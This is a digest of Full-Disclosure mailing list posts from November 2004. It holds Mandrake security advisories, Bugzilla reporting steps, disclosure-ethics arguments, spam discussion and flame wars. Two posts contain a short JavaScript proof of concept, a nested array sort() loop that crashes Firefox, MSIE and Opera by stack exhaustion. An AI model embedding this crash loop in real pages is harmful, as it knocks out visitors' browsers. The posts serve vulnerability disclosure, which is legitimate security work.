Berend-Jan Wever wrote: I'd have loved to CC mozilla about this, but I didn't have the time to do the crash course how to write a bug report and go through all that bugzilla crap. Well, Mozilla does have a well know security email alias for those who don't have the time to do a crash course on Bugzilla - see http://www.mozilla.org/projects/security/security-bugs-policy.html (but if you don't have time visit that link, I'll save you the trouble and say it starts with [EMAIL PROTECTED]) Bugzilla really isn't that difficult either. Below are detailed instructions if anyone cares. Steps 4-6 you can ignore if you already have a Bugzilla account. Step 9 gives detailed info on what to fill in the actual bug reporting form. There are only two critically important pieces on that form: the details text box, and the security checkbox. However, carefully filling in as much information as you can will make it likelier the bug gets fixed faster. 1. Type bugzilla.mozilla.org in your browsers location bar and go there 2. Click the link: Report A Bug 3. Either login if you already have an account, or click create new account. Let's assume we need to create a new account... 4. Type in a valid email address and click Create Account 5. [mail] Read email that was sent to the address to get password 6. back on in the browser, click log in here 7. fill in your username and password and click login 8. Select product link, for example Firefox 9. there's a form to fill in, let's go this part over in detail since I think this is the scariest part: 9.1 There is a search box, but if you are reporting a security bug in the latest product, chances are there are no dupes so just jump on over 9.2 Select a component that you think most closely describes where the problem occurs - if you can't figure out, just choose something, for example General 9.3 Hardware, operating system and build identifier are already filled in correctly for you if you are reporting the bug in the same product where you found it - if you can't figure these out, don't worry - just describe the stuff later on 9.4 If you know a URL where this happens (for example a testcase), fill that in 9.5 Give a brief summary 9.6 The details are next - basically what you'd put in a vulnerability report email or post goes here 9.7 Next it's going to ask even in more details, just to make sure the developers get all the info - if you already filled these parts in the details section, you can ignore them. The fields are: reproducibility, steps to reproduce, actual results, expected results, additional information 9.8 IMPORTANT: Check that security box! This way your bug will get the speediest attention, and it will also restrict people access to the bug until it is opened (either by you or someone else) 9.9 lastly severity 10. Submit bug report, and you are done! Then, whenever someone changes the bug, you will get an email of the changes with a link to the bug. People may ask you more questions etc. Commenting on the bug later on is trivial - just go the URL (Bugzilla may ask you to login again), type in your comments in the Additional Comments textbox and hit the Commit button. There are a lot of other fields, but typically the developers and more experienced Bugzilla users will take care of changing those. At this point the bug basically resembles a normal web forum from user's point of view. And if you really have the time, I recommend you go read the docs that are linked under the When reporting a bug section on https://bugzilla.mozilla.org/ -- Heikki Toivonen signature.asc Description: OpenPGP digital signature
Re: [Full-Disclosure] Re: FIREFOX flaws: nested array sort() loop Stack overflow exception
On November 25, 2004 07:51 am, Gadi Evron wrote: I'd have loved to CC mozilla about this, but I didn't have the time to do the crash course how to write a bug report and go through all that bugzilla crap. So instead you unleash it upon kiddie and spammer world? That's lovely. Some people are advocates of this or that disclosure mechanism, and believe they are right. I can bite. You just say: I'm so cool. I will release this, get a ton of attention and then say 'hey! They violated GPL! How dare they?!' He didn't have to release it... he could have sold it or any number of other things including just exploiting it quietly. We should stop shooting the messenger and say thanks to people who do other's debugging for free and for all our own good. my 2c, --dr -- World Security Pros. Cutting Edge Training, Tools, and Techniques Vancouver, Canada May 4-6 2005 http://cansecwest.com pgpkey http://dragos.com/ kyxpgp ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Fwd: Hi, It's Me !!!!!
On Thu, 25 Nov 2004 11:52:34 CST, Todd Towles said: Could you please not forward your spam to the list. This is a 411 scam...if you don't know what that is..then please contact this person and talk to him. Looking for information on '419 scams' would probably be more productive http://www.secretservice.gov/alert419.shtml pgp6a2Yzlu9v2.pgp Description: PGP signature
[Full-Disclosure] MDKSA-2004:140 - Updated a2ps packages fix vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandrakelinux Security Update Advisory ___ Package name: a2ps Advisory ID:MDKSA-2004:140 Date: November 25th, 2004 Affected versions: 10.0, 10.1, 9.2, Corporate Server 2.1 __ Problem Description: The GNU a2ps utility fails to properly sanitize filenames, which can be abused by a malicious user to execute arbitray commands with the privileges of the user running the vulnerable application. The updated packages have been patched to prevent this problem. ___ References: http://www.securityfocus.com/bid/11025 __ Updated Packages: Mandrakelinux 10.0: 0bf1c46cdf3a997c80ffa55a04b53144 10.0/RPMS/a2ps-4.13b-5.1.100mdk.i586.rpm ca914fbd0811bef76be2c39924cdf2a1 10.0/RPMS/a2ps-devel-4.13b-5.1.100mdk.i586.rpm c33b533dc073d747b31393b9e041da03 10.0/RPMS/a2ps-static-devel-4.13b-5.1.100mdk.i586.rpm c7248cd5bc4defb373a64e9cdfc2333c 10.0/SRPMS/a2ps-4.13b-5.1.100mdk.src.rpm Mandrakelinux 10.0/AMD64: 6504506036c88ffbe443c2d537d27da9 amd64/10.0/RPMS/a2ps-4.13b-5.1.100mdk.amd64.rpm fab58ecff86622a511e8b1652476f6fe amd64/10.0/RPMS/a2ps-devel-4.13b-5.1.100mdk.amd64.rpm 3fa0c58c19e86837f613a1bb9e304044 amd64/10.0/RPMS/a2ps-static-devel-4.13b-5.1.100mdk.amd64.rpm c7248cd5bc4defb373a64e9cdfc2333c amd64/10.0/SRPMS/a2ps-4.13b-5.1.100mdk.src.rpm Mandrakelinux 10.1: fc5b71001b6026112eed7a9eede99df5 10.1/RPMS/a2ps-4.13b-5.1.101mdk.i586.rpm 78ce0c31be6b53057a634b2043479aee 10.1/RPMS/a2ps-devel-4.13b-5.1.101mdk.i586.rpm 27e916c46412c26970339a099c844136 10.1/RPMS/a2ps-static-devel-4.13b-5.1.101mdk.i586.rpm 07c4873e2c4bd8cdedcefc4b9c320100 10.1/SRPMS/a2ps-4.13b-5.1.101mdk.src.rpm Mandrakelinux 10.1/X86_64: 00b9ef256d69081035981b62217c5d45 x86_64/10.1/RPMS/a2ps-4.13b-5.1.101mdk.x86_64.rpm 51d1efed305bdccea43df7c1e7edea05 x86_64/10.1/RPMS/a2ps-devel-4.13b-5.1.101mdk.x86_64.rpm eb1a73a1770c13ffc7a4cc305ebf6bf9 x86_64/10.1/RPMS/a2ps-static-devel-4.13b-5.1.101mdk.x86_64.rpm 07c4873e2c4bd8cdedcefc4b9c320100 x86_64/10.1/SRPMS/a2ps-4.13b-5.1.101mdk.src.rpm Corporate Server 2.1: 336ec30048b5ad2fa05180994987c6fa corporate/2.1/RPMS/a2ps-4.13-14.1.C21mdk.i586.rpm 82712d8a212252f79b109b25991cfb04 corporate/2.1/RPMS/a2ps-devel-4.13-14.1.C21mdk.i586.rpm 060d1b6ab37de7ca0f4a557da8460c34 corporate/2.1/RPMS/a2ps-static-devel-4.13-14.1.C21mdk.i586.rpm e8bf67681741edfb61fb6fc171dd2f8f corporate/2.1/SRPMS/a2ps-4.13-14.1.C21mdk.src.rpm Corporate Server 2.1/x86_64: 03da1d600f76bf0719276b6676cae414 x86_64/corporate/2.1/RPMS/a2ps-4.13-14.1.C21mdk.x86_64.rpm 20ae91d5efc781cd07af91c25ac2d444 x86_64/corporate/2.1/RPMS/a2ps-devel-4.13-14.1.C21mdk.x86_64.rpm 76cbf03ba34f5c51bf066e4ce9419235 x86_64/corporate/2.1/RPMS/a2ps-static-devel-4.13-14.1.C21mdk.x86_64.rpm e8bf67681741edfb61fb6fc171dd2f8f x86_64/corporate/2.1/SRPMS/a2ps-4.13-14.1.C21mdk.src.rpm Mandrakelinux 9.2: 57cde82f819f69584e29dc96a0d68431 9.2/RPMS/a2ps-4.13b-5.1.92mdk.i586.rpm 4557bbde873d94394cce32c64f544783 9.2/RPMS/a2ps-devel-4.13b-5.1.92mdk.i586.rpm 678978ae070b88ac922d74bb7d3df7cf 9.2/RPMS/a2ps-static-devel-4.13b-5.1.92mdk.i586.rpm 5824c8481814e78bc430bf780d22fd84 9.2/SRPMS/a2ps-4.13b-5.1.92mdk.src.rpm Mandrakelinux 9.2/AMD64: 6b72be6ec18fb727987ef32db913730d amd64/9.2/RPMS/a2ps-4.13b-5.1.92mdk.amd64.rpm 00f3f4b88dd753fd655e459bf6cd2e64 amd64/9.2/RPMS/a2ps-devel-4.13b-5.1.92mdk.amd64.rpm ee628914ed89857c10ce2391d6985e2d amd64/9.2/RPMS/a2ps-static-devel-4.13b-5.1.92mdk.amd64.rpm 5824c8481814e78bc430bf780d22fd84 amd64/9.2/SRPMS/a2ps-4.13b-5.1.92mdk.src.rpm ___ To upgrade automatically use MandrakeUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandrakesoft for security. You can obtain the GPG public key of the Mandrakelinux Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandrakelinux at: http://www.mandrakesoft.com/security/advisories If you want to report vulnerabilities, please contact security_linux-mandrake.com Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Linux Mandrake Security Team security linux-mandrake.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.0.7 (GNU/Linux) iD8DBQFBpm3rmqjQ0CJFipgRAvwfAJ9u9BB6Zbakn0/+UJ2R8cL0SKrXWQCfYWk3 1VxwXm4YJnbvxmtbVUsRnkg= =WtSF -END PGP SIGNATURE- ___
[Full-Disclosure] MDKSA-2004:141 - Updated zip packages fix vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandrakelinux Security Update Advisory ___ Package name: zip Advisory ID:MDKSA-2004:141 Date: November 25th, 2004 Affected versions: 10.0, 10.1, 9.2, Corporate Server 2.1 __ Problem Description: A vulnerability in zip was discovered where zip would not check the resulting path length when doing recursive folder compression, which could allow a malicious person to convince a user to create an archive containing a specially-crafted path name. By doing so, arbitrary code could be executed with the permissions of the user running zip. The updated packages are patched to prevent this problem. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-1010 http://www.hexview.com/docs/20041103-1.txt __ Updated Packages: Mandrakelinux 10.0: 1e5802bb9192115c0297a6b7ba6f76a3 10.0/RPMS/zip-2.3-11.1.100mdk.i586.rpm 5c1be66eafb405bf267f1e054b9cd920 10.0/SRPMS/zip-2.3-11.1.100mdk.src.rpm Mandrakelinux 10.0/AMD64: 352a1d6484d0db7c9042db80aee5c04e amd64/10.0/RPMS/zip-2.3-11.1.100mdk.amd64.rpm 5c1be66eafb405bf267f1e054b9cd920 amd64/10.0/SRPMS/zip-2.3-11.1.100mdk.src.rpm Mandrakelinux 10.1: e18d0a51f7022d7678bb910800d96d0e 10.1/RPMS/zip-2.3-11.1.101mdk.i586.rpm 019a2a83fca4bf70bc2511135106d1c6 10.1/SRPMS/zip-2.3-11.1.101mdk.src.rpm Mandrakelinux 10.1/X86_64: 969dadec6aff42e9afa6b630717e76c4 x86_64/10.1/RPMS/zip-2.3-11.1.101mdk.x86_64.rpm 019a2a83fca4bf70bc2511135106d1c6 x86_64/10.1/SRPMS/zip-2.3-11.1.101mdk.src.rpm Corporate Server 2.1: d0b652eac98e98f9448a3e0d457ad135 corporate/2.1/RPMS/zip-2.3-9.1.C21mdk.i586.rpm 52c2fb0a8b56d4ea0d9b7cf30fdb2b1c corporate/2.1/SRPMS/zip-2.3-9.1.C21mdk.src.rpm Corporate Server 2.1/x86_64: b2b3a8376eb45d5d01110a6fd486464e x86_64/corporate/2.1/RPMS/zip-2.3-9.1.C21mdk.x86_64.rpm 52c2fb0a8b56d4ea0d9b7cf30fdb2b1c x86_64/corporate/2.1/SRPMS/zip-2.3-9.1.C21mdk.src.rpm Mandrakelinux 9.2: 2b5d0768820cc09510fbb475cc171a59 9.2/RPMS/zip-2.3-11.1.92mdk.i586.rpm 7b71799d3a87cc2223e3f918d8dc1f7c 9.2/SRPMS/zip-2.3-11.1.92mdk.src.rpm Mandrakelinux 9.2/AMD64: 65f90a795bc46f8ae408f4a033dd12c8 amd64/9.2/RPMS/zip-2.3-11.1.92mdk.amd64.rpm 7b71799d3a87cc2223e3f918d8dc1f7c amd64/9.2/SRPMS/zip-2.3-11.1.92mdk.src.rpm ___ To upgrade automatically use MandrakeUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandrakesoft for security. You can obtain the GPG public key of the Mandrakelinux Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandrakelinux at: http://www.mandrakesoft.com/security/advisories If you want to report vulnerabilities, please contact security_linux-mandrake.com Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Linux Mandrake Security Team security linux-mandrake.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.0.7 (GNU/Linux) iD8DBQFBpm8SmqjQ0CJFipgRAphzAJ9U1hNQKY5QzRiODuyux+thm7LIdgCgiA/5 hMMH5O7qWcsbds1J+OJe2RA= =YeXZ -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] MSIE FIREFOX flaws: detailed advisory and comments that you probably don't want to read anyway
Skip to the -- Advisory -- part if you are not interested in reading about disclosure but you are interested in non-technical details about the array sort vulnerability I released. - Original Message - From: Dragos Ruiu [EMAIL PROTECTED] He didn't have to release it... he could have sold it or any number of other things including just exploiting it quietly. We should stop shooting the messenger and say thanks to people who do other's debugging for free and for all our own good. my 2c, --dr Exactly. And since none of the vulnerable vendors have put out an advisory as far as I know, I'll let you all know the impact of this bug myself. For free because I don't want you to lose any sleep over a lame crash: -- Advisory -- Both MSIE and firefox have the same problem handling this. Since a lot of people did not understand me when I told you in 1337 h4x0r15h, I'll put it in n00b English: The code I posted makes both browsers use up (stack)memory again and again untill there is no more left. This causes an exception which can not be handled by both programs so both of them will be terminated: nothing to worry about, there is no exploit for this, it just crashes the program. -- End advisory -- So... it was all a big piece of FUD, which was exactly what I needed to get my point across. I do not kid myself that I can convince everybody, but at least I got a lot of people thinking and hopefully even more convinced that a lot of vendors do not acknowledge indepedent security researchers for their true value and (even more important to a lot of you) do not act upon bugs as fast as is needed nowadays. What if I was without integrity, as some people would have it, and would write a worm exploiting some (or all) of the bugs I had found over the years ? Think about it... I could have sold a worm like that for good money to less scrupulous people but instead I chose to disclose all that information responsible. People that do not agree I disclosed the information on the IFRAME vulnerability responsible are people that could not have gathered the information for themselves from the earlier post by ned. Everybody that could exploit it (it wasn't that difficult) allready knew what I told you and probably was exploiting it without you knowing. I truely am sorry for the people who do not understand my motives or think I did wrong. I am even more sorry for people that got hit with InternetExploiter and it's derivatives. Both should keep in mind that if I had not disclosed this, AV/IDS/etc vendors would not have known about/acted upon the problem and a patch would have been even lower priority than it seems to be now. Saying that there was no problem before I released the exploit code for the IFRAME vulnerability is a load of dingo's kidneys. I believe a lot more people could have been affected and in much worse ways then they have been now if this had remained undergound. Cheer, SkyLined PS. Note to self: stop wasting time on useless discussions on the internet. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Why is IRC still around?
i didn't get responses from anyone i knew ... i got responses from people who knew you, get it? btw, our offer still stands. if you would like to try and substantiate your claims, feel free to come back and try your hardest. this is over and never should have begun. DO NOT REPLY. I WILL NOT RESPOND. --vord On Thu, 25 Nov 2004 14:49:50 +, n3td3v [EMAIL PROTECTED] wrote: On Wed, 24 Nov 2004 21:17:24 -0600, vord [EMAIL PROTECTED] wrote: this is quite possibly the most ridiculous thing ive ever read. normally i would respond to it in more detail but i have received literally dozens of responses from members of this list who either sympathize with my position or have outright called you an idiot/lamer. i therefore see no need to defend myself or #hackphreak publicly when the public does not require it. they already know you're a moron, i dont need to beat a dead horse by making you look the fool over and over again. I'm sure all your script kiddie friends are backing you up, I don't doubt it for a second. That doesn't mean your right, it just means you have alot of script kiddie friends with the same views as yourself. It sounds like you've got the script kiddie support of the FD list. What an achievement, you must be so proud of yourself, so proud you had to post it on FD how many private e-mails you get off-list agreeing with you. If i'm an idiot lamer, i'd hate to hear what they're calling you. Thanks, n3td3v ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Mailing lists and unsolicited/malicious spam
How many people are actually subscribed (on FD) and what are the general figures for subscribers for high profile mailing lists, has any figures ever been released? And would the theft of the list of e-mails subscribed be of value to spammers? I think it would be, I hope FD admin is up to date with and keeping tracks of bugs as the rest of us. If malicious hackers/script kiddies got hold of the list, I think they would be able to attack a good percentage of inboxes with whatever they send. Weather it be porn spam or a phishing to take passwords or if it be malcious code to take advantage of POP mail clients via SMTP. I think already FD is targeted by spam/phishing hackers who wish to collect e-mail addresses for further exploration. Perhaps posting on FD could be a security risk in itself (well not just FD but mailing lists online in general) as far as POP mail clients and SMTP is concerned. (web-based e-mail has its own problems which usually don't have the risk of taking over computers like mail clients do. Usually web-based e-mail is just at risk from xss/cookie disclosure/account theft, whereas malicious code sent to mail clients can take over whole computer systems) For those of you who already have a mailing list only e-mail address and a seperate address for work related/corporate/company matters, do you see a different level of unsolicited spam, compared to the work address or other private e-mail address for friends and family? I'm thinking about setting up the same myself, just for experimental reasons! I think i'll find some differences between the two. Sorry if you don't care about anti-spam, but its something i'm interested in. Sorry to all the script kiddie hax0rs who don't like me working against you and your e-mail collecting bots! Plus, do FD admin and other high profile mailing lists have honey pots or similar methods to catch FD/mailing list born spam? I believe a big mailing list can have its own domestic/internal spam, seperate from the general internet who are not subscribed to the given mailing list or lists, and even different mailing lists having its own group of spammers targeting them, with its own nature of spam/phish/malicious code exploration. Thanks, n3td3v ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Fwd: Hi, It's Me !!!!!
[EMAIL PROTECTED] wrote: On Thu, 25 Nov 2004 11:52:34 CST, Todd Towles said: Could you please not forward your spam to the list. This is a 411 scam...if you don't know what that is..then please contact this person and talk to him. Looking for information on '419 scams' would probably be more productive http://www.secretservice.gov/alert419.shtml 411 scams is when you call Directory Assistance and ask for, for instance, I. P. Freely. (Yes, thats a joke) ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Re: Opera flaws: nested array sort() loop Stack overflow exception
Opera Browser (v7.54 for Windows) crashes as well with mentioned code:
HTML
SCRIPT a = new Array(); while (1) { (a = new Array(a)).sort(); }
/SCRIPT
SCRIPT a = new Array(); while (1) { (a = new Array(a)).sort(); }
/SCRIPT
/HTML
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Fwd: Hi, It's Me !!!!!
On Thu, 25 Nov 2004 11:52:34 CST, Todd Towles said: Could you please not forward your spam to the list. This is a 411 scam...if you don't know what that is..then please contact this person and talk to him. Looking for information on '419 scams' would probably be more productive http://www.secretservice.gov/alert419.shtml There's also the option of fighting back... http://www.419eater.com/. Pursue this at your own risk, but it can lead to some pretty funny results. Dan ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] University Researchers Challenge Bush Win In Florida
I asked very nicely...and didn't say it wasn't in some weird way connected and normally I do delete the messages I don't want to see. But I also contacted people directly if I feel that the list will have nothing to add to the talk. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Steve Wray Sent: Wednesday, November 24, 2004 10:09 PM To: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] University Researchers Challenge Bush Win In Florida Todd Towles wrote: Did the charter say something about political messages?..please take it off the list guys if possible... Actually, I thought that particular post was in the spirit of the list... It seemed to me to address technologies and methodologies. I didn't think that it dwelled on party political issues. Though, to be honest, I think Paul should have sent that last one just to the addressee not to the list. But he does come up with some gems so he won't go on my plonkers list :) If you want to be truly pedantic as to what counts as political, well... there wouldn't be much to choose from. Everything is politics if you squint hard enough. I find the best method of dealing with full disclosure is that every time you see someone post something you consider off topic or a troll or whatever suits your taste, simply filter their address out. Filtering by subject doesn't help much as trolls will post to *anything* but trolls *will* post. So as long as I filter out anyone that seems like a troll (or otherwise an idiot) full disclosure comes up with some gems. And the best part is that if someone on your plonker list says something genuinely interesting, they will doubtless be quoted by someone else so you may still get to read it. And the list has an archive. Without filters I'd have left FD years ago... -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Paul Schmehl Sent: Wednesday, November 24, 2004 11:22 AM To: Jason Coombs; Gregory Gilliss; [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] University Researchers Challenge Bush Win In Florida --On Wednesday, November 24, 2004 05:39:31 AM + Jason Coombs [EMAIL PROTECTED] wrote: [massive snip] ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] FIREFOX flaws: nested array sort()
Sounds like he does it For fun. That's what I'd do.
RandallM wrote:
So, where do you all stand. Exploit for fame or for purpose?
-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of
Berend-Jan Wever
Sent: 25 November 2004 01:05
To: [EMAIL PROTECTED];
[EMAIL PROTECTED]; [EMAIL PROTECTED]
Subject: [Full-Disclosure] FIREFOX flaws: nested array sort()
loop Stack overflow exception
Hi all,
Same flaw works for Firefox as well as MSIE:
HTML
SCRIPT a = new Array(); while (1) { (a = new
Array(a)).sort(); } /SCRIPT
SCRIPT a = new Array(); while (1) { (a = new
Array(a)).sort(); } /SCRIPT /HTML
Added to the list:
http://www.edup.tudelft.nl/~bjwever/advisory_firefox_flaws.html
I'd have loved to CC mozilla about this, but I didn't have
the time to do the crash course how to write a bug report
and go through all that bugzilla crap.
Cheers,
SkyLined
http://www.edup.tudelft.nl/~bjwever
Randall M
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Mailing lists and unsolicited/malicious spam
It would be good to see the user's email addresses obfuscated in some way. M2c [EMAIL PROTECTED] -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of n3td3v Sent: Friday, 26 November 2004 11:38 AM To: [EMAIL PROTECTED] Subject: [Full-Disclosure] Mailing lists and unsolicited/malicious spam How many people are actually subscribed (on FD) and what are the general figures for subscribers for high profile mailing lists, has any figures ever been released? And would the theft of the list of e-mails subscribed be of value to spammers? I think it would be, I hope FD admin is up to date with and keeping tracks of bugs as the rest of us. If malicious hackers/script kiddies got hold of the list, I think they would be able to attack a good percentage of inboxes with whatever they send. Weather it be porn spam or a phishing to take passwords or if it be malcious code to take advantage of POP mail clients via SMTP. I think already FD is targeted by spam/phishing hackers who wish to collect e-mail addresses for further exploration. Perhaps posting on FD could be a security risk in itself (well not just FD but mailing lists online in general) as far as POP mail clients and SMTP is concerned. (web-based e-mail has its own problems which usually don't have the risk of taking over computers like mail clients do. Usually web-based e-mail is just at risk from xss/cookie disclosure/account theft, whereas malicious code sent to mail clients can take over whole computer systems) For those of you who already have a mailing list only e-mail address and a seperate address for work related/corporate/company matters, do you see a different level of unsolicited spam, compared to the work address or other private e-mail address for friends and family? I'm thinking about setting up the same myself, just for experimental reasons! I think i'll find some differences between the two. Sorry if you don't care about anti-spam, but its something i'm interested in. Sorry to all the script kiddie hax0rs who don't like me working against you and your e-mail collecting bots! Plus, do FD admin and other high profile mailing lists have honey pots or similar methods to catch FD/mailing list born spam? I believe a big mailing list can have its own domestic/internal spam, seperate from the general internet who are not subscribed to the given mailing list or lists, and even different mailing lists having its own group of spammers targeting them, with its own nature of spam/phish/malicious code exploration. Thanks, n3td3v ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ** Please note that your email address is known to AUSTRAC for the purposes of communicating with you. The information transmitted in this e-mail is for the use of the intended recipient only and may contain confidential and/or legally privileged material. If you have received this information in error you must not disseminate, copy or take any action on it and we request that you delete all copies of this transmission together with attachments and notify the sender. This footnote also confirms that this email message has been swept for the presence of computer viruses. ** ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Why is IRC still around?
On Thu, 25 Nov 2004 18:34:03 -0600, vord [EMAIL PROTECTED] wrote: i didn't get responses from anyone i knew ... i got responses from people who knew you, get it? btw, our offer still stands. if you would like to try and substantiate your claims, feel free to come back and try your hardest. this is over and never should have begun. DO NOT REPLY. I WILL NOT RESPOND. --vord Ok, I won't reply to call you and this e-mail childish. Too bad, my finger slipped. Thanks, n3td3v ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
